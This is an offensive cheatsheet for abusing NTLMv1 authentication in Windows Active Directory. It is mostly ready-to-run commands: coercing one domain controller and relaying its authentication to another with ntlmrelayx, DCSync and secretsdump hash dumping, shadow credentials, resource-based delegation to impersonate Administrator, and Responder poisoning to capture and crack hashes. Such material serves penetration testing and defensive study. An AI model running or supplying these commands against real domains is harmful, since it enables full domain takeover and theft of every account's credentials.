NTLMv1
Cheatsheet for NTLMv1 abuse
Check if NTLMv1 is in use - Method 0
nxc smb $dc -u $admin -p $adminpw -M ntlmv1
[!warning] Administrative privileges required :(
Coerce and relay two DC’s to each other - Method 1
# DCsync with ntlmrelayx
ntlmrelayx.py -t dcsync://$dc-fqdn -smb2support # -auth-smb $user:$pass
nxc smb $dc2 -u $user -p $pass -M coerce_plus -o LISTENER=$attacker ALWAYS=true
# DCsync with secretsdump
ntlmrelayx.py -t smb://$dc-fqdn -socks -smb2support # --remove-mic
nxc smb $dc2 -u $user -p $pass -M coerce_plus -o LISTENER=$attacker ALWAYS=true
prox -f proxychains4relayx.conf secretsdump.py -no-pass $domain/DC1$@ip
[!tip] If you receive NTLMv1 hashes from the DC, its possible that you can relay two DC’s to each other and use the computer account of one DC to the other. While an computer account is normally not special is an domain controller computer accounts typically highly trusted making an DCSync Attack or RBCD/ Shadow Credentials attack possible, source
Shadow credentials - Method 2
# Coerce dc1 and relay to dc2 to create shadow credentials
ntlmrelayx.py -t ldap://$dc-fqdn --remove-mic -smb2support --shadow-credentials
nxc smb $dc2 -u $user -p $pass -M coerce_plus -o LISTENER=$attacker ALWAYS=true
# Retrieving pfx - Method 1
python3 gettgtpkinit.py -cert-pfx [CERTIFICATE].pfx -pfx-pass [PASSWORD] $domain/$dc [TICKET].ccache # If fails, switch DC
export KRB5CCNAME=[TICKET].ccache
python3 getnthash.py $domain/$dc -key [AS-REP encryption key]
# Retrieving pfx - Method 2
certipy cert -pfx [CERTIFICATE].pfx -password [PASSWORD] -export -out dc2.pfx
certipy auth -pfx dc2.pfx -dc-ip $dc-username [MACHINE ACCOUNT$] -domain $domain
# Cleanup, clear shadow creds
certipy shadow clear -account [MACHINE ACCOUNT$] -dc-ip $dc -u administrator@$dc -hashes <NT>
[!example] Sources
Delegate access - Method 3
# If the port is closed or filtered, pray MAQ is set not set to 0, if not 0, then create machine account with addcomputer.py or nxc
nmap -p 636 $dc
nxc ldap $dc -u $user -p $pass -M maq
nxc smb $dc -u $user -p $pass -M add-computer -o NAME='AttackerPC' PASSWORD=''
# Relaying to delegate access
ntlmrelayx.py -t ldap://$dc-fqdn --keep-relaying --remove-mic -smb2support --delegate-access | tee ntlmrelayx.txt
# Relaying to delegate access with specified user
ntlmrelayx.py -t ldap://$dc-fqdn --keep-relaying --remove-mic -smb2support --delegate-access --no-validate-privs --escalate-user [CONTROLLED-MACINE-ACC]$
# Coercing :D
nxc smb $dc2 -u $user -p $pass -M coerce_plus -o LISTENER=$attacker ALWAYS=true
# Request S4U2Self+Proxy tickets to impersonate Administrator
getST.py -spn cifs/$dc2-fqdn -impersonate Administrator $domain/AttackerPC$:[PASSWORD]
export KRB5CCNAME=[TICKET].ccache
# DCsync
secretsdump.py -k $dc2 -user-status -outputfile dcsync_hashes / nxc smb $dc2 --use-kcache --ntds --user=Administrator
# Cleanup, restore the msDS-AllowedToActOnBehalfOfOtherIdentity attribute to its original state
rbcd.py -delegate-to 'dc2$' $domain/administrator -hashes : -dc-ip $dc -action read
rbcd.py -delegate-to 'dc2$' $domain/administrator -hashes : -dc-ip $dc -action flush
[!example] Sources
[!warning] When you can’t create a machine account but do have the NT hash of a machine account you can use pth under normal circumstance. But if the domain has disabled “weak” Kerberos algorithm, then RC4 (hash/pth) won’t work with tickets. You can try to reset the password of the computer accounts with ksetup so that the DC (and you) have AES keys for that ticket.
Cracking - Method 4
sudo Responder -I ens33 -ntlmchallenge 1122334455667788 --lm / --disable-ess
[!info] The
--lmflag can make the hashes crackable almost immediately via rainbow tables. If that does not work, try the--disable-essflag instead. When SSP cannot be removed, rainbow table attacks are no longer effective. In that case, the hash can still be cracked with Hashcat after reformatting it using ntlmv1-multi or by using assless-chaps. Source
Relaying WINRMS - Method 5 (under specific circumstances)
# Relaying
ntlmrelayx.py -t winrms://$dc -smb2support -socks --keep-relaying
sudo Responder -I ens33
# Dump secrets if you get an hit
prox -f proxychains4relayx.conf secretsdump.py -no-pass $domain/DC1$@$target-ip
[!info] Requirements
- NTLMv1 in use or an NTLM downgrade path is available
- Target has a WinRM-over-HTTPS (WinRMS) listener configured
- Channel Binding Tokens (CBT) are not enforced (or are set to “None/Relaxed”) on that WinRMS listener
- ARP/LLMNR/NBT-NS poisoning possible
[!example] Sources